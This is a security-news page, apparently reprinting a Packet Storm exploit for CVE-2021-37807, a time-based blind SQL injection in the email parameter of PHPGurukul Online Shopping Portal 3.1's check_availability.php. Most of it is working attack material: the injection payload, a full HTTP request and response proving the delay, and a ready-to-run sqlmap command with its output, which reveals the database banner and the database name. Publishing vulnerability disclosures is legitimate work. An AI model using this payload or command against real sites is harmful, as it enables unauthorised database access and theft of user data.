Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-37807: Online Shopping Portal 3.1 SQL Injection ≈ Packet Storm

An SQL Injection vulneraility exists in https://phpgurukul.com Online Shopping Portal 3.1 via the email parameter on the /check_availability.php endpoint that serves as a checker whether a new user’s email is already exist within the database.

CVE
#sql#web#windows#apache#git#php#auth#firefox#ssl
# Exploit Title: Online Shopping Portal - time-based blind SQL Injection# Date: 2021-07-09# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/shopping-portal-free-download/# Version: 3.1# Tested on: Windows 10, XAMPP################# Description  ################## The email parameter is vulnerable to time-based SQL injection on the /check_availability.php endpoint that serves as a checker whether a new user's email is already exist within the database or not. Based on the payload used on 'email' parameter which is "[email protected]'XOR(if(now()=sysdate(),sleep(5),0))XOR'fsx", the server response is about 5 seconds delay which mean it is vulnerable to MySQL Blind (Time Based). An attacker can use sqlmap to further the exploitation for extracting sensitive information from the database.###################### PoC of detection  ######################Request:========POST /shopping/check_availability.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 65Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/shopping/login.phpCookie: PHPSESSID=94hqeuk00aj25glgtju4105n06Sec-GPC: [email protected]'XOR(if(now()=sysdate(),sleep(5),0))XOR'fsxResponse: duration = 340 bytes | 5,005 millis========HTTP/1.1 200 OKDate: Fri, 09 Jul 2021 14:15:14 GMTServer: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.24X-Powered-By: PHP/5.6.24Content-Length: 121Connection: closeContent-Type: text/html; charset=UTF-8<span style='color:green'> Email available for Registration .</span><script>$('#submit').prop('disabled',false);</script>######################### PoC of exploitation  ########################## Run sqlmap to extract current database name:$ sqlmap -u "http://localhost/shopping/check_availability.php" --data="[email protected]" --cookie="PHPSESSID=94hqeuk00aj25glgtju4105n06" --timeout=30 -p "email" --level=3 --risk=1 --threads=10 --time-sec=5 -b --current-db --batch --answers="crack=N,dict=N,continue=Y,quit=N" --technique=T ############ Output  ############---Parameter: email (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: [email protected]' AND (SELECT 4922 FROM (SELECT(SLEEP(5)))SAxU)-- ILJB---[INFO] the back-end DBMS is MySQL[INFO] fetching bannermulti-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N[INFO] retrieved: [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 10.1.19-MariaDBweb server operating system: Windowsweb application technology: PHP 5.6.24, Apache 2.4.23back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)banner: '10.1.19-MariaDB'[INFO] fetching current database[INFO] retrieved: shoppingcurrent database: 'shopping'

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907